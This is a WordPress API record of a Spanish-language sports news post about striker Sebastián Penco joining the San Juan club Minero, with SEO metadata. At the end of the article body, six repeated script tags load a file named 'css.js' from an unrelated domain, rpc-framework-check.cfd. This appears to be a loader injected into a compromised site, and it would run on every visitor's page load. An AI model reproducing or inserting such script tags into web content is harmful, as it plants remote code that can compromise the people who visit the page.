{"id":23510,"date":"2025-08-13T13:50:02","date_gmt":"2025-08-13T16:50:02","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=23510"},"modified":"2026-02-02T18:58:00","modified_gmt":"2026-02-02T21:58:00","slug":"gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino","status":"publish","type":"post","link":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/","title":{"rendered":"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El f\u00fatbol sanjuanino vive una noticia que dar\u00e1 que hablar: Sebasti\u00e1n \u201cMotoneta\u201d Penco, hist\u00f3rico goleador y exfigura de San Mart\u00edn en Primera Divisi\u00f3n, volver\u00e1 a las canchas para defender los colores de Minero, el tradicional equipo \u201ca pico y pala\u201d de la Liga Sanjuanina de F\u00fatbol.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El delantero, muy recordado por su efectividad en el Verdinegro durante su paso por la \u00e9lite del f\u00fatbol argentino, acept\u00f3 el reto de sumarse al plantel que disputar\u00e1 el Torneo Clausura de Primera Divisi\u00f3n.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Con su experiencia y olfato goleador, Penco buscar\u00e1 aportar jerarqu\u00eda y liderazgo a un Minero que apunta alto en el campeonato local. Su llegada encendi\u00f3 el entusiasmo de los hinchas, que ya esperan con ansias verlo debutar oficialmente.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>El f\u00fatbol sanjuanino vive una noticia que dar\u00e1 que hablar: Sebasti\u00e1n \u201cMotoneta\u201d Penco, hist\u00f3rico goleador y exfigura de San Mart\u00edn en Primera Divisi\u00f3n, volver\u00e1 a las canchas para defender los colores de Minero, el tradicional equipo \u201ca pico y pala\u201d de la Liga Sanjuanina de F\u00fatbol. El delantero, muy recordado por su efectividad en el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":23511,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,2,24,178],"tags":[],"class_list":["post-23510","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacada","category-featured","category-futbol","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"El f\u00fatbol sanjuanino vive una noticia que dar\u00e1 que hablar: Sebasti\u00e1n \u201cMotoneta\u201d Penco, hist\u00f3rico goleador y exfigura de San Mart\u00edn en Primera Divisi\u00f3n, volver\u00e1 a las canchas para defender los colores de Minero, el tradicional equipo \u201ca pico y pala\u201d de la Liga Sanjuanina de F\u00fatbol. El delantero, muy recordado por su efectividad en el [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-13T16:50:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:58:00+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/465283w850h660c.png.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"850\" \/>\n\t<meta property=\"og:image:height\" content=\"660\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#article\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino\",\"datePublished\":\"2025-08-13T16:50:02+00:00\",\"dateModified\":\"2026-02-02T21:58:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/\"},\"wordCount\":142,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/465283w850h660c.png.webp\",\"articleSection\":[\"destacada\",\"Featured\",\"Futbol\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/\",\"name\":\"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#primaryimage\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/465283w850h660c.png.webp\",\"datePublished\":\"2025-08-13T16:50:02+00:00\",\"dateModified\":\"2026-02-02T21:58:00+00:00\",\"breadcrumb\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/465283w850h660c.png.webp\",\"contentUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/465283w850h660c.png.webp\",\"width\":850,\"height\":660},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/13\\\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/","og_locale":"es_ES","og_type":"article","og_title":"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino - San Juan Deportes","og_description":"El f\u00fatbol sanjuanino vive una noticia que dar\u00e1 que hablar: Sebasti\u00e1n \u201cMotoneta\u201d Penco, hist\u00f3rico goleador y exfigura de San Mart\u00edn en Primera Divisi\u00f3n, volver\u00e1 a las canchas para defender los colores de Minero, el tradicional equipo \u201ca pico y pala\u201d de la Liga Sanjuanina de F\u00fatbol. El delantero, muy recordado por su efectividad en el [&hellip;]","og_url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-08-13T16:50:02+00:00","article_modified_time":"2026-02-02T21:58:00+00:00","og_image":[{"width":850,"height":660,"url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/465283w850h660c.png.webp","type":"image\/webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#article","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino","datePublished":"2025-08-13T16:50:02+00:00","dateModified":"2026-02-02T21:58:00+00:00","mainEntityOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/"},"wordCount":142,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/465283w850h660c.png.webp","articleSection":["destacada","Featured","Futbol","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#respond"]}]},{"@type":"WebPage","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/","url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/","name":"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#primaryimage"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/465283w850h660c.png.webp","datePublished":"2025-08-13T16:50:02+00:00","dateModified":"2026-02-02T21:58:00+00:00","breadcrumb":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#primaryimage","url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/465283w850h660c.png.webp","contentUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/465283w850h660c.png.webp","width":850,"height":660},{"@type":"BreadcrumbList","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/13\/gol-y-experiencia-penco-regresa-a-las-canchas-y-jugara-en-el-futbol-sanjuanino\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Gol y experiencia: Penco regresa a las canchas y jugar\u00e1 en el f\u00fatbol sanjuanino"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"http:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23510","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=23510"}],"version-history":[{"count":8,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23510\/revisions"}],"predecessor-version":[{"id":28690,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23510\/revisions\/28690"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/23511"}],"wp:attachment":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=23510"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=23510"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=23510"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}